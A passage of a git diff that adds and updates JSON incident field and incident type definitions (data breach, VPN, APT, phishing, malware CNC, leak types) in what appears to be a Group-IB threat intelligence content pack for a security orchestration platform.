b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Upload_Time.json @@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Data Breach" + ], + "caseInsensitive": true, + "cliName": "gibuploadtime", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibuploadtime", + "isReadOnly": false, + "locked": false, + "name": "GIB Upload Time", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Data Breach" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Names.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Names.json new file mode 100644 index 000000000000..7ac276bae4df --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Names.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Suspicious IP VPN" + ], + "caseInsensitive": true, + "cliName": "gibvpnnames", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibvpnnames", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB VPN Names", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Suspicious IP VPN" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Sources.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Sources.json new file mode 100644 index 000000000000..d63715460d53 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Sources.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Suspicious IP VPN" + ], + "caseInsensitive": true, + "cliName": "gibvpnsources", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibvpnsources", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB VPN Sources", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Suspicious IP VPN" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Victim_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Victim_IP.json index 844b30c29085..93c8bbcaf995 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Victim_IP.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Victim_IP.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Vulnerability_Type.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Vulnerability_Type.json new file mode 100644 index 000000000000..172c88acd294 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Vulnerability_Type.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibvulnerabilitytype", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibvulnerabilitytype", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Vulnerability Type", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_APT_Threat.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_APT_Threat.json new file mode 100644 index 000000000000..88660da43156 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_APT_Threat.json @@ -0,0 +1,34 @@ +{ + "autorun": true, + "color": "#AA00FF", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB APT Threat", + "layout": "GIB APT Threat Layout", + "locked": false, + "name": "GIB APT Threat", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_DDOS.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_DDOS.json new file mode 100644 index 000000000000..b352da1c0367 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_DDOS.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#E46BCD", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Attacks DDOS", + "layout": "GIB Attacks DDOS Layout", + "locked": false, + "name": "GIB Attacks DDOS", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Deface.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Deface.json new file mode 100644 index 000000000000..104379145485 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Deface.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#CE9057", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Attacks Deface", + "layout": "GIB Attacks Deface Layout", + "locked": false, + "name": "GIB Attacks Deface", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Group.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Group.json new file mode 100644 index 000000000000..d69ea11fa6b4 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Group.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#AA00FF", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Attacks Phishing Group", + "layout": "GIB Attacks Phishing Group Layout", + "locked": false, + "name": "GIB Attacks Phishing Group", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Kit.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Kit.json new file mode 100644 index 000000000000..c6396b161e67 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Kit.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#E5CF7C", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Attacks Phishing Kit", + "layout": "GIB Attacks Phishing Kit Layout", + "locked": false, + "name": "GIB Attacks Phishing Kit", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing.json index a52729f791e5..eb9da9940960 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing.json @@ -22,8 +22,8 @@ "layout": "GIB Brand Protection Phishing Layout", "locked": false, "name": "GIB Brand Protection Phishing", - "onChangeRepAlg": 2, - "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", "readonly": false, "reputationCalc": 2, "system": false, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing_Kit.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing_Kit.json index b6f9c1d01baa..175ee4a4049e 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing_Kit.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing_Kit.json @@ -22,10 +22,10 @@ "layout": "GIB Brand Protection Phishing Kit Layout", "locked": false, "name": "GIB Brand Protection Phishing Kit", - "onChangeRepAlg": 2, - "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", "readonly": false, - "reputationCalc": 2, + "reputationCalc": 0, "system": false, "version": -1, "weeks": 0, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account.json index 583c50fe8554..198a914b60da 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account.json @@ -27,10 +27,10 @@ "layout": "GIB Compromised Account Layout", "locked": false, "name": "GIB Compromised Account", - "onChangeRepAlg": 2, - "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", "readonly": false, - "reputationCalc": 2, + "reputationCalc": 0, "system": false, "version": -1, "weeks": 0, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account_Group.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account_Group.json new file mode 100644 index 000000000000..7b9c409ee3c6 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account_Group.json @@ -0,0 +1,34 @@ +{ + "autorun": true, + "color": "#AA00FF", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Compromised Account Group", + "layout": "GIB Compromised Account Group Layout", + "locked": false, + "name": "GIB Compromised Account Group", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card.json index fa71203f5d7d..9844b67bc4bb 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card.json @@ -22,10 +22,10 @@ "layout": "GIB Compromised Card Layout", "locked": false, "name": "GIB Compromised Card", - "onChangeRepAlg": 2, - "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", "readonly": false, - "reputationCalc": 2, + "reputationCalc": 0, "system": false, "version": -1, "weeks": 0, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card_Group.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card_Group.json new file mode 100644 index 000000000000..0afd88a1e8b5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card_Group.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#A3C9FF", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Compromised Card Group", + "layout": "GIB Compromised Card Group Layout", + "locked": false, + "name": "GIB Compromised Card Group", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Mule.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Mule.json new file mode 100644 index 000000000000..e4c8b6d931d8 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Mule.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#AA00FF", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Compromised Mule", + "layout": "GIB Compromised Mule Layout", + "locked": false, + "name": "GIB Compromised Mule", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat.json new file mode 100644 index 000000000000..79f2c8164ea7 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#AA00FF", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Cybercriminal Threat", + "layout": "GIB Cybercriminal Threat Layout", + "locked": false, + "name": "GIB Cybercriminal Threat", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat_Actor.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat_Actor.json new file mode 100644 index 000000000000..9b757ab8514f --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat_Actor.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#AA00FF", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Cybercriminal Threat Actor", + "layout": "GIB Cybercriminal Threat Actor Layout", + "locked": false, + "name": "GIB Cybercriminal Threat Actor", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Data_Breach.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Data_Breach.json index 2b7d5db1e306..8c91f6f62df2 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Data_Breach.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Data_Breach.json @@ -7,7 +7,13 @@ "detached": false, "disabled": false, "extractSettings": { - "fieldCliNameToExtractSettings": {}, + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, "mode": "Specific" }, "hours": 0, @@ -16,10 +22,10 @@ "layout": "GIB Data Breach Layout", "locked": false, "name": "GIB Data Breach", - "onChangeRepAlg": 1, - "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", "readonly": false, - "reputationCalc": 1, + "reputationCalc": 0, "system": false, "version": -1, "weeks": 0, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware.json new file mode 100644 index 000000000000..51dc061eca64 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#4B897A", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Malware", + "layout": "GIB Malware Layout", + "locked": false, + "name": "GIB Malware", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware_CNC.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware_CNC.json new file mode 100644 index 000000000000..f3cbc21932ad --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware_CNC.json @@ -0,0 +1,36 @@ +{ + "id": "GIB Malware CNC", + "version": -1, + "vcShouldIgnore": false, + "locked": false, + "name": "GIB Malware CNC", + "prevName": "GIB Malware CNC", + "color": "#00E5FF", + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "hours": 0, + "days": 0, + "weeks": 0, + "hoursR": 0, + "daysR": 0, + "weeksR": 0, + "system": false, + "readonly": false, + "default": false, + "autorun": false, + "disabled": false, + "reputationCalc": 0, + "onChangeRepAlg": 0, + "layout": "GIB Malware CNC Layout", + "detached": false, + "extractSettings": { + "mode": "Specific", + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "isExtractingAllIndicatorTypes": true, + "extractIndicatorTypesIDs": [] + } + } + }, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat.json new file mode 100644 index 000000000000..1ea511d6341e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#AA00FF", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Nation-State Cybercriminals Threat", + "layout": "GIB Nation-State Cybercriminals Threat Layout", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat_Actor.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat_Actor.json new file mode 100644 index 000000000000..def87bf7b0e9 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat_Actor.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#AA00FF", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Nation-State Cybercriminals Threat Actor", + "layout": "GIB Nation-State Cybercriminals Threat Actor Layout", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Actor", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Git_Leak.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Git_Leak.json index 0cadfedf15cd..19eb85315a7b 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Git_Leak.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Git_Leak.json @@ -7,8 +7,14 @@ "detached": false, "disabled": false, "extractSettings": { - "fieldCliNameToExtractSettings": {}, - "mode": "All" + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" }, "hours": 0, "hoursR": 0, @@ -16,10 +22,10 @@ "layout": "GIB OSI Git Leak Layout", "locked": false, "name": "GIB OSI Git Leak", - "onChangeRepAlg": 1, - "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", "readonly": false, - "reputationCalc": 1, + "reputationCalc": 0, "system": false, "version": -1, "weeks": 0, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Public_Leak.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Public_Leak.json index 7bc385ed374f..b02072bc0119 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Public_Leak.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Public_Leak.json @@ -7,8 +7,14 @@ "detached": false, "disabled": false, "extractSettings": { - "fieldCliNameToExtractSettings": {}, - "mode": "All" + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" }, "hours": 0, "hoursR": 0, @@ -16,10 +22,10 @@ "layout": "GIB OSI Public Leak Layout", "locked": false, "name": "GIB OSI Public Leak", - "onChangeRepAlg": 1, - "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", "readonly": false, - 